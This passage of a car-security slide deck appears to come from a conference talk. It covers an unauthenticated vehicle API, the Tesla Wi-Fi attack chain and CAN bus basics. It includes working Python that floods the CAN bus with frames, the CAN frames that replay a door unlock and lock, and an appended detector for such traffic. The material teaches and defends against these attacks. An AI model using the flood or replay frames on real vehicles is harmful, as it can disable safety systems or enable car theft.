$ API without Authentication
• GET https://[redacted].com/orchestration_1111/gdc/RemoteACRecordsRequest.php?RegionCode=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0U60XXXXX
• VIN : Vehicle Identification Number
Slide 21
$ Case Study : Wi-Fi
• Black Hat 2017 : Free-fall: Tesla Hacking
• Attack chain shown in the diagram:
− Get control of Wi-Fi
− Exploit the WebKit browser
− Root the in-vehicle system
− Patch and disable AppArmor
− Bypass ECU’s firmware integrity verification
− Reprogram modified Gateway firmware
− Send malicious CAN msg on CAN Bus
− Get control of CAN Bus
• Diagram labels: CID, ECUs
Slide 22
Why Hack the CAN Bus?
Slide 23
>_ Intro of CAN Bus
Slide 24
$ What is CAN Bus?
• Controller Area Network
• Low cost, integrated controllers
• Diagram nodes: Head light, Tail light, Dash board, Doors, ABS, Engine Control, Suspension Control, Gateway
• Diagram buses: Low Speed CAN (Body Control Bus), High Speed CAN (Powertrain Control Bus)
Slide 25
$ CAN Data Frame Format
• Arbitration Identifier (ArbID): 11 bits or 29 bits
• Data Length Code (DLC): 4 bits
• Data: up to 8 bytes
Slide 26
$ CAN Bus Arbitration
• Supported by hardware
• Software implementation becomes easy and immediate.
• Priority: 0 > 1
Slide 27
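$ Fault Confinement
• States: Error Active, Error Passive, Bus Off
• Reset and Config: enter Error Active
• Error Active to Error Passive: REC => 127 or TEC => 127
• Error Passive to Error Active: REC < 127 or TEC < 127
• Error Passive to Bus Off: TEC > 255
• Bus Off to Error Active: Reset, Config and Reception of 128x11 Recessive Bits
• REC: Receive Error Counter
• TEC: Transmit Error Counter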
Slide 28
>_ Security Issues on CAN Bus
Slide 29
$ Denial-of-Service
import ics

# Open the first attached device and set the HS CAN channel to 500000 bit/s
device = ics.find_devices()[0]
ics.open_device(device)
NetworkID = ics.NETID_HSCAN
ics.set_bit_rate(device, 500000, NetworkID)

msg = ics.SpyMessage()       # Setup the message
msg.ArbIDOrHeader = 0x0      # CAN ID
msg.NetworkID = NetworkID    # Channel 1 on the ValueCAN
msg.Data = (0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)

# Transmit the same frame in an endless loop
while True:
    ics.transmit_messages(device, msg)
Slide 30
$ Testbed
Slide 31
$ Result
Slide 32
$ Replay Attack
• Diagram nodes: Head light, Tail light, Dash board, Doors, ABS, Engine Control, Suspension Control, Gateway, Attacker
Slide 33
$ Testbed
Slide 34
$ Unlock the Door
ArbID Data…
44D 4D,00,80,00,00,00,00,00
440 40,00,80,11,01,0F,0F,0F
442 42,00,80,00,00,00,00,00
44D 4D,01,80,00,01,00,00,00
440 40,01,80,11,01,00,00,00
631 18,80,53,04,00,12,00,00
Slide 35
$ Lock the Door
ArbID Data…
44D 4D,00,80,00,00,00,00,00
440 40,00,80,11,01,0F,0F,0F
442 42,00,80,00,00,00,00,00
44D 4D,01,80,00,01,00,00,00
440 40,01,80,11,01,00,00,00
631 18,80,53,02,00,12,00,00
Slide 36
$ Demo
Slide 37
>_ Conclusion
• Survey of the Car Security
− Cyber security skills are useful in car security.
• CAN Bus
− A useful protocol before the car connects to the Internet.
− Easy to attack with DoS and replay attacks.
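A defender-side view of the DoS and replay slides, as an added example that is not code from the original deck: an allowlist plus rate check over a CAN capture, which flags ArbIDs never seen in known-good traffic and known ArbIDs arriving much faster than their baseline. The log line format, the timestamps, the 100 ms period and all function names are assumptions made for this example; the slides do not say that these frames are periodic.

```python
def parse(line):
    # Assumed line format: "<seconds> <ArbID hex> <comma-separated data bytes>"
    ts, arb_id, data = line.split()
    return float(ts), int(arb_id, 16), bytes.fromhex(data.replace(",", ""))

def learn_baseline(frames):
    """From known-good traffic: the set of ArbIDs seen and each ID's shortest gap."""
    last, min_gap = {}, {}
    for ts, arb_id, _ in frames:
        if arb_id in last:
            gap = ts - last[arb_id]
            min_gap[arb_id] = min(gap, min_gap.get(arb_id, gap))
        last[arb_id] = ts
    return set(last), min_gap

def detect(frames, known_ids, min_gap, tolerance=0.5):
    """Flag IDs outside the allowlist and known IDs arriving far faster than baseline."""
    last, alerts = {}, []
    for ts, arb_id, _ in frames:
        if arb_id not in known_ids:
            alerts.append((ts, arb_id, "unknown-id"))
        elif arb_id in last and arb_id in min_gap:
            if ts - last[arb_id] < tolerance * min_gap[arb_id]:
                alerts.append((ts, arb_id, "too-fast"))
        last[arb_id] = ts
    return alerts

# Constructed sample traffic. ArbIDs and payloads are the ones on the slides;
# the timestamps and the 100 ms period are assumptions made for this example.
PAYLOADS = {"44D": "4D,00,80,00,00,00,00,00",
            "440": "40,00,80,11,01,0F,0F,0F",
            "442": "42,00,80,00,00,00,00,00"}

def periodic(start, cycles):
    return [f"{start + c * 0.1 + k * 0.001:.3f} {arb_id} {data}"
            for c in range(cycles) for k, (arb_id, data) in enumerate(PAYLOADS.items())]

BASELINE_LOG = periodic(0.0, 5)
SUSPECT_LOG = sorted(
    periodic(1.0, 3)
    + ["1.120 44D 4D,00,80,00,00,00,00,00"]                       # extra copy of a known frame
    + [f"1.15{n} 000 00,00,00,00,00,00,00,00" for n in range(3)],  # burst of ArbID 0x0
    key=lambda line: parse(line)[0])

def run():
    known_ids, min_gap = learn_baseline(map(parse, BASELINE_LOG))
    return detect(map(parse, SUSPECT_LOG), known_ids, min_gap)

if __name__ == "__main__":
    for ts, arb_id, reason in run():
        print(f"{ts:.3f}  {arb_id:03X}  {reason}")
```

A replayed frame is byte-for-byte identical to a legitimate one, so this check can only notice it through timing or through an ID that does not belong on the bus.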